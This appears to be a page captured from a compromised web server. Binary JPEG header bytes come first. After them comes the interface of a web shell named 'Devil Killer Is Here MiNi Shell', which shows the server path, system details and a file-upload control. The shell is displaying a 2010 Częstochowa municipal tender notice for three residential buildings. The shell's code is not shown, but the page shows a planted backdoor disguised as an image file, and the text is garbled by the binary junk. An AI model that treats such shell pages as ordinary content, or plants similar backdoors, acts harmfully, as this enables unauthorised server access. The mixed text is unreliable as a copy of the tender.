JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100414/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100414/83803-N-2010.html

<p class="kh_header"><b>Częstochowa: budowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz   przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.</b><br>
<b>Numer ogłoszenia: 83803 - 2010; data zamieszczenia: 14.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Częstochowa , ul. Śląska 11/13, 42-217 Częstochowa, woj. śląskie, tel. (034) 3707100, faks 034 3707175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> budowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz   przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest udowa trzech budynków mieszkalnych komunalnych wielorodzinnych przy ulicy Bardowskiego w Częstochowie wraz z zagospodarowaniem terenu działki (dojazdy, parkingi, chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji  deszczowej,  centralnego ogrzewania oraz przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.

1. Lokalizacja:  Budynki mieszkalne wielorodzinne komunalne
                     Częstochowa, ul. Bardowskiego
                     Działka nr: 1/52, k.m. 279.   

2. Obszar objęty zamówieniem zaznaczono na załącznikach:
a) nr 1 i 2 do SIWZ - ZAKRES I
b) nr 3 do SIWZ - ZAKRES II

3. Przedmiot zamówienia należy podzielić i wycenić z podziałem na dwa zakresy opisane poniżej.   

Zamawiający zastrzega sobie oprawo do niepodpisania umowy na cały przedmiot  zamówienia w przypadku, kiedy w sumie kwota na  I i II ZAKRES realizacji inwestycji przekroczy zarezerwowane środki budżetowe na ten cel. Zamawiający dopuszcza możliwość realizacji zadania w całości lub tylko I zakresu.

ZAKRES I:  
a) Prace rozbiórkowe i wycinka drzew i krzewów.
W zakresie zamówienia przewiduje się rozbiórkę 5 budynków mieszkalnych, 4 budynków gospodarczych, elementy zagospodarowania terenu oraz wycinkę drzew i krzewów. 

b) Budowa budynku mieszkalnego nr B i nr C wraz z zagospodarowaniem terenu przyległej do budynków B i C działki (dojazdy, parkingi i chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji deszczowej, centralnego ogrzewania oraz  przebudową istniejącego uzbrojenia elektroenergetycznego i telekomunikacyjnego.

Budynek mieszkalny B - 
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2214,84 m2
- powierzchnia użytkowa mieszkań - 1572,98 m2
- powierzchnia zabudowy - 561,33 m2
- kubatura - 8158,90 m3
- liczba miejsc parkingowych - 90 + 3 dla niepełnosprawnych

Budynek mieszkalny C
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2210,58 m2
- powierzchnia użytkowa mieszkań - 1552,84 m2
- powierzchnia zabudowy - 556,92 m2
- kubatura - 8094,83 m3

Przyłącza kanalizacji deszczowej:
- Zakres kanalizacji deszczowej czystej (odwodnienie dachów) w zakresie dotyczącym budynków B i C tzn. rury spustowe od R1 do R18 z odprowadzeniem do studzienek rewizyjnych oraz odcinki kanałów deszczowych pomiędzy studzienkami rewizyjnymi D1, D2, D3, D4, D5, D6, D7, D8, D9 wraz z tymi studzienkami i odprowadzenie do kanalizacji deszczowej fi 250 mm przebiegającej w ulicy Bardowskiego. 
- Zakres kanalizacji deszczowej brudnej (odwodnienie terenu utwardzonego) do wykonania w całości łącznie z separatorem koalescencyjnym.

Przyłącza wody do bud. B i C
- Zakres obejmuje włączenie za pomocą nawiertki przyłącza wody z rur PE fi 90x8,2 mm do wodociągu ulicznego fi 150 mm przebiegającego w ulicy Bardowskiego oraz doprowadzenie do wodomierza głównego w budynku B w pomieszczeniu przeznaczonym na lokalizację zestawu pompowego podnoszenia ciśnienia (zestaw hydroforowy obejmuje projekt inst. wewnętrznej budynku B), a następnie doprowadzenie przewodem z rur PE fi 75x6,8 mm do rozgałęzienia w punkcie C oraz doprowadzenie przewodem z rur PE fi 63x5,8 mm do budynku C. 
- Przekładka wodociągu istniejącego fi 90 mm (dalej fi 50 mm) na wodociąg z rur PE fi 63x5,8 mm zasilający obiekty na działkach sąsiednich. 

Przyłącza kanalizacji sanitarnej:
- Zakres obejmuje odprowadzenie ścieków sanitarnych z budynków B i C do kanalizacji sanitarnej fi 250 mm w ulicy Bardowskiego (odcinki kanalizacji sanitarnej pomiędzy studzienkami rewizyjnymi S1, S2, S3, S4, S5, S6 wraz z tymi studzienkami). Dla każdego z budynków przewidziano dwa wyprowadzenia kanalizacji sanitarnej. Przykanaliki do budynków ujęto w projektach instalacji wewnętrznych.

Przyłącza c.o. niskich parametrów  od węzła kompaktowego w bud. B do budynku C.
- Zakres obejmuje wykonanie przyłącza c.o. niskich parametrów z rur stalowych czarnych preizolowanych od węzła kompaktowego w bud. B do bud. C - średnica przyłącza Dn 50 mm (fi 60,3x2,9/125mm). 

Przebudowa istniejącego uzbrojenia elektroenergetycznego.
- Zakres obejmuje całe zadanie objęte opracowaniem projektowym: 
1. zabezpieczenie istniejących kabli energetycznych,
2. demontaż istniejących kabli energetycznych.

Przebudowa istniejącego uzbrojenia telekomunikacyjnego. 
Zakres obejmuje:
- demontaż istniejących urządzeń telekomunikacyjnych 
- wykonanie kanalizacji telekomunikacyjnej rurami PVC 110/3 (wraz z wykonaniem studzienek telekomunikacyjnych typu SK-1 przy każdej klatce schodowej) umożliwiające zainstalowanie przez Operatora przewodów dla podłączenia telekomunikacyjnego budynków B i C. Kanalizację wykonać wzdłuż dwóch budynków od strony wejść i podłączyć z istniejącą kanalizacją w studzience nr 3/1.
- zabezpieczenie istniejących urządzeń telekomunikacyjnych. 

Oświetlenie terenu
Zakres obejmuje:
- Instalację oświetlenia terenu, tablice oświetleniowe TOTB i TOTC oraz ochronę od porażeń dot. budynku B i C. Oświetlenie terenu przyporządkowane będzie do każdego budynku oddzielnie - poszczególne tablice oświetlenia terenu umieszczone będą odpowiednio w budynku B i C w tablicach administracyjnych znajdujących się na parterze w wiatrołapach.

Drogi dojazdowe i chodniki budynków B i C.
Zakres obejmuje:
- Wykonanie wewnętrznego układu komunikacyjnego oznaczonego A-A1-A2-A3-A4-A5, który będzie dojazdem podstawowym do parkingów i projektowanych budynków oraz dróg dojazdowych oznaczonych A1-B i A2-B1 stanowiących dojazdy do parkingów i zatok postojowych dla mieszkańców budynków B i C, a także parkingu oznaczonego A4-D2,
- Wykonanie chodników znajdujących się na terenie przyległym do budynków B i C, schodów terenowych, cieku betonowego korytkowego oraz placyku gospodarczego.

Zagospodarowanie terenu przy budynkach B i C.
Zakres obejmuje:
- wykonanie placyku gospodarczego ze śmietnikiem z cegły klinkierowej, z trzepakiem i ławką, całość otoczona zielenią maskującą (10 szt. pnącza) - jest to element zagospodarowania terenu, który znajduje się na terenie działki objętej zakresem II, lecz należy go wykonać w zakresie I.
- wykonanie nasadzeń drzew i krzewów oraz trawników w zakresie obejmującym teren działki przy budynkach B i C. (Przedłożyć plan nasadzeń do uzgodnienia do Wydziału Ochrony Środowiska, Rolnictwa i Leśnictwa).  
- ustawienie przy wejściach do budynków po 2 ławki z oparciem oraz wzdłuż chodnika dla pieszych 5 ławek - rekreacja dla osób starszych.

Elementy zagospodarowania terenu, które znajdują się na terenie działki objętej zakresem II, a które w celu zapewnienia bezpieczeństwa powinny być wykonane w zakresie I:
- wykonanie ogrodzenia od strony placu zabaw (sam plac zabaw będzie wykonywany w zakresie II) i torów kolejowych o wys. 2,20 m długości ok. 100,0m
- wykonanie ekranu dźwiękoizolacyjnego - długości ok. 55 m
- wykonanie od strony torów kolejowych pasa zieleni izolacyjnej o szer. 5 m.

ZAKRES II:
Budowa budynku mieszkalnego nr D wraz z zagospodarowaniem terenu przyległej do budynku D działki (dojazdy, parkingi i chodniki); przyłączami: wody, kanalizacji sanitarnej, kanalizacji deszczowej, centralnego ogrzewania oraz przebudową istniejącego uzbrojenia  telekomunikacyjnego.
 
Budynek mieszkalny D 
Dane charakterystyczne budynku:
- powierzchnia użytkowa netto - 2073,53 m2
- powierzchnia użytkowa mieszkań - 1447,78 m2
- powierzchnia zabudowy - 528,19 m2
- kubatura - 7677,23 m3

Przyłącza kanalizacji deszczowej:
- Zakres kanalizacji deszczowej czystej (odwodnienie dachów) w zakresie dotyczącym budynku D tzn. rury spustowe od R19 do R25 z odprowadzeniem do studzienek rewizyjnych oraz odcinki kanałów deszczowych pomiędzy studzienkami rewizyjnymi D9, D10, D11, D12 oraz D9, D13, D14 wraz z tymi studzienkami.

Przyłącze wody do bud. D
- Zakres obejmuje doprowadzenie wody od punktu C przewodem z rur PE fi 75x6,8 mm do budynku D. 

Przyłącza kanalizacji sanitarnej:
- Zakres obejmuje odprowadzenie ścieków sanitarnych z budynku D do studzienki S2 wykonanej w ramach zakresu II (odcinki kanalizacji sanitarnej pomiędzy studzienkami rewizyjnymi S9, S8, S7, S2 wraz ze studzienkami S9, S8, S7). Dla budynku przewidziano dwa wyprowadzenia kanalizacji sanitarnej. Przykanaliki do budynku ujęto w projekcie instalacji wewnętrznej.

Przyłącza c.o. niskich parametrów  od węzła kompaktowego w bud. B do budynku D.
- Zakres obejmuje wykonanie przyłącza c.o. niskich parametrów z rur stalowych czarnych preizolowanych od węzła kompaktowego w bud. B do bud. D - średnica przyłącza Dn 50 mm (fi 60,3x2,9/125mm).

Przebudowa istniejącego uzbrojenia telekomunikacyjnego. 
Zakres obejmuje:
- Wykonanie kanalizacji telekomunikacyjnej rurami PVC 110/3 (wraz z wykonaniem studzienek telekomunikacyjnych typu SK-1 przy każdej klatce schodowej) umożliwiające zainstalowanie przez Operatora przewodów dla podłączenia telekomunikacyjnego budynku D. Kanalizację wykonać wzdłuż  budynku od strony wejść.

Oświetlenie terenu
Zakres obejmuje:
- Instalację oświetlenia terenu, tablicę oświetleniową TOTD oraz ochronę od porażeń dot. budynku D. Oświetlenie terenu przyporządkowane będzie do budynku D - tablica oświetlenia terenu umieszczona będzie w budynku D w tablicy administracyjnej znajdującej się na parterze w wiatrołapie.

Drogi dojazdowe i chodniki budynku D.
- Zakres obejmuje wykonanie drogi dojazdowej oznaczonej A3-C stanowiącej dojazd do parkingów i zatok postojowych dla mieszkańców budynku D, parkingu oznaczonego A4-D1, a także chodników znajdujących się na terenie przyległym do budynku D.

Zagospodarowanie terenu przy budynku D.
Zakres obejmuje:
- wykonanie placu zabaw z ławkami (10 szt.), zjeżdżalnią, huśtawkami (3 szt.), karuzelą i piaskownicą, całość otoczona drewniana palisadą,
- ustawienie przy wejściach do budynku po 2 ławki z oparciem, 
- wykonanie nasadzeń drzew i krzewów oraz trawników w zakresie obejmującym teren działki przy budynku D. (Przedłożyć plan nasadzeń do uzgodnienia do Wydziału Ochrony Środowiska, Rolnictwa i Leśnictwa).

4. Szczegółowy opis przedmiotu zamówienia zawierają:
a) dokumentacja projektowa składająca się z projektów budowlanych, spełniających funkcję projektów wykonawczych; 
b) przedmiary robót; 
c) specyfikacje techniczne wykonania i odbioru robót budowlanych w części zawierającej zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót.

Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie internetowej Zamawiającego: http://czestochowa.bip-gov.pl

W przypadku, gdyby Wykonawca nie posiadał dostępu do internetu, musi to zgłosić Zamawiającemu. W takiej sytuacji dokumentacja projektowa będzie udostępniana (wypożyczana) Wykonawcom w celu sporządzenia oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.23.32.26-9, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 100.000,00 zł (słownie złotych: Sto tysięcy 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy udokumentują wykonanie, tj. zakończenie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, budowy lub przebudowy 2 budynków (w  tym  jednego budynku mieszkalnego lub budynku użyteczności publicznej). Wartość budynku mieszkalnego lub budynku użyteczności publicznej (zdefiniowanego w Rozporządzeniu Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. Nr 75, poz. 690) powinna wynosić min. 4.000.000,00 zł brutto. 

Zamawiający dopuszcza wykonanie ww. roboty budowlanej w ramach jednej umowy lub w osobnych umowach (zamówieniach).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia, tj.: 
a) osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia określone przepisami Prawa budowlanego do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz co najmniej 5-letnie doświadczenie w pełnieniu funkcji kierownika budowy lub kierownika robót,
b) osobami, które będą pełnić funkcję kierowników robót, posiadającymi uprawnienia określone przepisami Prawa budowlanego do kierowania robotami budowlanymi w specjalnościach:
. instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
. instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
. drogowej;
. telekomunikacyjnej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie publiczne mogą ubiegać się Wykonawcy, którzy posiadają środki finansowe lub zdolność kredytową o łącznej kwocie w wysokości co najmniej 2 mln zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kosztorys (-y) ofertowy (-e) opracowany (-e) metodą kalkulacji szczegółowej lub uproszczonej zgodnie z Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 13 lipca 2001 r. w sprawie metod kosztorysowania obiektów i robót budowlanych (Dz. U. Nr 80, poz. 867).

UWAGA:
Ponieważ obowiązującym wynagrodzeniem jest wynagrodzenie ryczałtowe, kosztorys ofertowy jest jedynie dokumentem, który będzie wykorzystywany do obliczenia należnego wynagrodzenia Wykonawcy w przypadku odstąpienia od umowy, a więc w sytuacji uregulowanej w § 10 wzoru umowy. Kosztorys ofertowy nie będzie miał zastosowania na etapie oceny ofert - będzie na tym etapie postępowania dokumentem poglądowym, służącym zamawiającemu do zorientowania się w poziomie poszczególnych cen. 

2. Wypełniony Druk Oferta, stanowiący załącznik nr 4 do specyfikacji istotnych warunków zamówienia.
3. Dowód wpłaty wadium.
4. Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli wykonawca posiada taki wpis.

W przypadku spółek cywilnych w ofercie należy złożyć zaświadczenia z Urzędu Skarbowego oraz z Zakładu Ubezpieczeń Społecznych zarówno na spółkę, jak i na każdego ze wspólników.

UWAGA 1:
Zgodnie z art. 26 ust. 2b Prawa zamówień publicznych wykonawca może polegać na wiedzy i doświadczeniu oraz osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany  jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, tj. przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. 

UWAGA 2:
Wszystkie ww. dokumenty winny być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez osobę (-y) uprawnioną (-e) do składania oświadczeń woli w imieniu Wykonawcy.

